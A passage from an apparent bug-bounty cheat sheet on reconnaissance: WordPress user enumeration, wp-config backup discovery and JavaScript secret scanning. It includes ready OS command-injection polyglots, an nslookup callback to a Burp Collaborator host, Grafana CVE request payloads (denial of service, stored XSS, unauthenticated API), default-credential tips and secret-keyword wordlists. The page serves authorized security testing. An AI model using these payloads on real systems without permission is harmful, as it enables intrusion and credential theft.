wp-config.html
wp-config.php.bak
wp-config.php.dist
wp-config.php.inc
wp-config.php.old
wp-config.php.save
wp-config.php.swp
wp-config.php.txt
wp-config.php.zip
wp-config.php.html
wp-config.php~
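The user-enumeration and wp-config backup checks above as code, written for this page as an added example (not from any linked resource): parse the REST users response down to login names, read the username out of the `?author=1` redirect, generate the backup URLs from the list above, and confirm a hit actually leaks database settings before reporting it. The JSON and config text are constructed samples in the shape WordPress produces; fetching the URLs with an HTTP client is assumed.

```python
import json
import re
from urllib.parse import urljoin

USER_ENDPOINTS = ["wp-json/wp/v2/users/", "?rest_route=/wp/v2/users", "?author=1"]

# Exactly the candidate names from the list above.
BACKUP_SUFFIXES = [
    ".wp-config.php.swp", "wp-config.inc", "wp-config.old", "wp-config.txt",
    "wp-config.html", "wp-config.php.bak", "wp-config.php.dist", "wp-config.php.inc",
    "wp-config.php.old", "wp-config.php.save", "wp-config.php.swp", "wp-config.php.txt",
    "wp-config.php.zip", "wp-config.php.html", "wp-config.php~",
]


def usernames_from_rest(body):
    """The `slug` field is the login name; the display `name` often differs from it."""
    try:
        users = json.loads(body)
    except ValueError:
        return []  # HTML error page, WAF block, or the endpoint is disabled
    if not isinstance(users, list):
        return []
    return [u["slug"] for u in users if isinstance(u, dict) and "slug" in u]


def username_from_author_redirect(location):
    """?author=N answers with a redirect to /author/<login>/ on a default install;
    pass the Location header value."""
    m = re.search(r"/author/([^/?#]+)", location or "")
    return m.group(1) if m else None


def backup_urls(base):
    """Candidate URLs to request for an exposed wp-config backup."""
    return [urljoin(base, suffix) for suffix in BACKUP_SUFFIXES]


def looks_like_wp_config(body):
    """A 200 alone is not proof (many hosts return 200 for everything); the body
    must actually carry the define() lines with the database password."""
    return "DB_PASSWORD" in body and "define(" in body


# Constructed samples.
SAMPLE_USERS_JSON = '[{"id":1,"name":"Site Admin","slug":"admin"},{"id":2,"name":"Jane","slug":"jane-doe"}]'
SAMPLE_CONFIG = "<?php\ndefine('DB_NAME', 'wp');\ndefine('DB_PASSWORD', 'hunter2');\n"
```

Report the leaked config with the password redacted; the proof is the define() lines, not the credential itself.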

GitHub-Dorks

1. Github Dorks

https://docs.google.com/presentation/d/1lqBriLkclVwCi4q_VhJUXa-GYehLsMp054PzN4qrTn8/mobilepresent?slide=id.g9e14b666d8_0_147

2. Automation for finding high-entropy strings in a git repository
https://github.com/trufflesecurity/truffleHog

SearchEngine

1. Search Engine dorks
https://docs.google.com/presentation/d/1dBXWUFKXa6gWQNCifN939Wf1ZNTIELlRZ4FhcaHvSOE/mobilepresent?slide=id.gce482a8cc4_0_310

TravisCI

1. Automation that fetches repos, builds, and logs for a given organization from TravisCI
https://github.com/lc/secretz

os command injection

Time-based polyglot (Burp Scanner's): one string that breaks out of an unquoted, single-quoted or double-quoted argument on both Windows (ping -n) and Unix (ping -c); a delay of about 20 seconds in the response confirms injection
|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
Out-of-band confirmation over DNS, for when output and timing are not observable
|nslookup -q=cname my.burpcollaborator.net.&

Grafana

1. CVE-2020-13379 (Denial of Service)
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D

2. CVE-2020-11110 (Stored XSS)
POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL>
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}}
content-type: application/json
Connection: close

{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}

3. CVE-2019-15043 (Grafana Unauthenticated API)
POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL>
Connection: close
Content-Length: 235
Accept: */*
Accept-Language: en
Content-Type: application/json

{"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

4. Default Credentials
Try to login using admin as username and password

5. Signup Enabled
<GRAFANA URL>/signup

Admin access endpoints

/dev/register/
/stag/register/
/dev/login/
/register/
/internal/
/stag/

Admin access subdomains

dev
stag
admin
internal
stag-dev
stag-admin
internal-dev

Os command injection

/cgi-bin/parameter=payload

WordPress wordlist

wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml
wp-admin/setup-config.php?step=1

Wordlist for finding secrets in JS files and GitHub

cloudinary://
CONFIG
DB_NAME
DB_USER
DB_PASSWORD
DB_HOST
bucket name
Jenkins
OTP
oauth
authorization
password
pwd
ftp
dotfiles
JDBC
key-keys
send_key-keys
send,key-keys
token
user
login-signin
passkey-passkeys
pass
secret
SecretAccessKey
app_AWS_SECRET_ACCESS_KEY AWS_SECRET_ACCESS_KEY
credentials
config
security_credentials
connectionstring
ssh2_auth_password
aws_access_key
aws_secret_key
S3_BUCKET
S3_ACCESS_KEY_ID
S3_SECRET_ACCESS_KEY_ID
S3_ENDPOINT
AWS_ACCESS_KEY_ID
list_aws_accounts
SMTP password
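Putting the wordlist above and the JS-analysis section (LinkFinder, scripthunter) to work, as an added example written for this page rather than code from any of those tools: one pass over a JavaScript bundle that pulls out endpoints the way LinkFinder does and flags the secret names from the list as key/value assignments, plus a few key formats that identify themselves regardless of the variable name. The bundle is a constructed sample; the AWS key in it is the example key from AWS's own documentation, not a live credential. The pattern set is a starting point, not a complete one.

```python
import re

# Quoted absolute URLs or root-relative paths: the strings LinkFinder pulls out.
ENDPOINT_RE = re.compile(r"""["'`](https?://[^"'`\s]+|/[A-Za-z0-9_./?=&%-]+)["'`]""")

# Names from the wordlist above, matched as key = "value" or key: "value" pairs.
SECRET_NAMES = (
    "DB_NAME|DB_USER|DB_PASSWORD|DB_HOST|AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|"
    "SecretAccessKey|S3_BUCKET|S3_ACCESS_KEY_ID|S3_SECRET_ACCESS_KEY_ID|S3_ENDPOINT|"
    "aws_access_key|aws_secret_key|connectionstring|SMTP_PASSWORD|password|passwd|pwd|"
    "secret|token|api_key|apikey"
)
ASSIGNMENT_RE = re.compile(
    r"\b(" + SECRET_NAMES + r")\b\s*[:=]\s*[\"']([^\"']{4,})[\"']", re.IGNORECASE
)

# Key formats that identify themselves regardless of the variable name.
FORMAT_RES = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "cloudinary_url": re.compile(r"cloudinary://\d+:[A-Za-z0-9_-]+@[A-Za-z0-9_-]+"),
    "jdbc_url": re.compile(r"jdbc:[a-z]+://[^\s\"']+"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}


def find_endpoints(js):
    """Sorted, de-duplicated URLs and paths referenced by the bundle."""
    return sorted({m.group(1) for m in ENDPOINT_RE.finditer(js)})


def find_secrets(js):
    """List of (kind, value) hits; kind is the matched name (lower-cased) or format."""
    hits = []
    for m in ASSIGNMENT_RE.finditer(js):
        hit = (m.group(1).lower(), m.group(2))
        if hit not in hits:
            hits.append(hit)
    for kind, rx in FORMAT_RES.items():
        for m in rx.finditer(js):
            hit = (kind, m.group(0))
            if hit not in hits:
                hits.append(hit)
    return hits


# Constructed sample bundle; AKIAIOSFODNN7EXAMPLE is AWS's documented example key.
SAMPLE_BUNDLE = r'''
const API = "https://api.example.com/v1";
fetch("/api/internal/users?limit=50").then(r => r.json());
var cfg = {DB_PASSWORD: "hunter2", region: "us-east-1", debug: true};
const AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE";
const CLOUDINARY_URL = "cloudinary://123456789012:abcDEFghiJKL@demo-cloud";
const ds = "jdbc:mysql://db.internal:3306/app";
'''
```

Run find_secrets() over every file scripthunter or gau turns up, then verify a hit before reporting: an AKIA key is proven with a single harmless sts get-caller-identity call, and the endpoints feed straight into the API testing described in the reconnaissance links.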



Source: https://reconshell.com/bug-bounty-resources/